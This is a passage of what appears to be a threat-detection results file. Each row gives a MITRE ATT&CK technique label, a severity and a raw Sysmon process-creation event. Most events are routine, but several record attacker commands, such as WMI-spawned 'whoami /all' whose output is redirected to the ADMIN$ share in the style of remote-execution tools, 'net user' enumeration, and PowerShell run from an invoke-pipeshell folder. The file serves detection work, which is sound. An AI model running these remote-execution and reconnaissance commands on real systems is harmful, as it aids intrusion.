+    <Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
+    <Data Name=""LogonId"">0x9cf992</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
+    <Data Name=""ParentProcessId"">2404</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-12-04T22:41:04.470207Z"">
+    </TimeCreated>
+    <EventRecordID>549016</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3560"" ThreadID=""4600"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-12-04 22:41:04.465</Data>
+    <Data Name=""ProcessGuid"">747F3D96-BB00-5FCA-0000-001033CD7600</Data>
+    <Data Name=""ProcessId"">8536</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">svchost.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
+    <Data Name=""LogonGuid"">747F3D96-3407-5FCB-0000-0020E5030000</Data>
+    <Data Name=""LogonId"">0x3e5</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">612</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:46:43.819347Z"">
+    </TimeCreated>
+    <EventRecordID>341</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:46:43.675</Data>
+    <Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-001032047C00</Data>
+    <Data Name=""ProcessId"">1656</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
+    <Data Name=""LogonId"">0x7beb57</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
+    <Data Name=""ParentProcessId"">3412</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-29T20:59:21.539311Z"">
+    </TimeCreated>
+    <EventRecordID>8048</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1896"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-29 20:59:21.539</Data>
+    <Data Name=""ProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
+    <Data Name=""ProcessId"">3376</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\invoke-pipeshell-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
+    <Data Name=""LogonId"">0x10896</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6231-5CC7-0000-00104CF71800</Data>
+    <Data Name=""ParentProcessId"">3940</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-04-20T20:33:14.273416Z"">
+    </TimeCreated>
+    <EventRecordID>578505</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3392"" ThreadID=""4112"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-04-20 20:33:14.246</Data>
+    <Data Name=""ProcessGuid"">747F3D96-3A8A-607F-0000-0010E4717700</Data>
+    <Data Name=""ProcessId"">5280</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">svchost.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
+    <Data Name=""LogonGuid"">747F3D96-82AF-607F-0000-0020E5030000</Data>
+    <Data Name=""LogonId"">0x3e5</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">612</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:05:20.378005Z"">
+    </TimeCreated>
+    <EventRecordID>342407</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:05:16.721</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E90C-5F33-0000-0010CB420200</Data>
+    <Data Name=""ProcessId"">3320</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E909-5F33-0000-00108C580000</Data>
+    <Data Name=""ParentProcessId"">612</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-29T20:59:21.539311Z"">
+    </TimeCreated>
+    <EventRecordID>8048</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1896"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-29 20:59:21.539</Data>
+    <Data Name=""ProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
+    <Data Name=""ProcessId"">3376</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\invoke-pipeshell-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
+    <Data Name=""LogonId"">0x10896</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6231-5CC7-0000-00104CF71800</Data>
+    <Data Name=""ParentProcessId"">3940</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:35:13.449839Z"">
+    </TimeCreated>
+    <EventRecordID>9838</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:35:13.434</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-0010ADBF1E00</Data>
+    <Data Name=""ProcessId"">3372</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
+    <Data Name=""LogonId"">0x1ea3c6</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
+    <Data Name=""ParentProcessId"">3572</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
+    </TimeCreated>
+    <EventRecordID>9828</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
+    <Data Name=""ProcessId"">2828</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
+    </TimeCreated>
+    <EventRecordID>9828</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
+    <Data Name=""ProcessId"">2828</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
+    </TimeCreated>
+    <EventRecordID>9828</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
+    <Data Name=""ProcessId"">2828</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
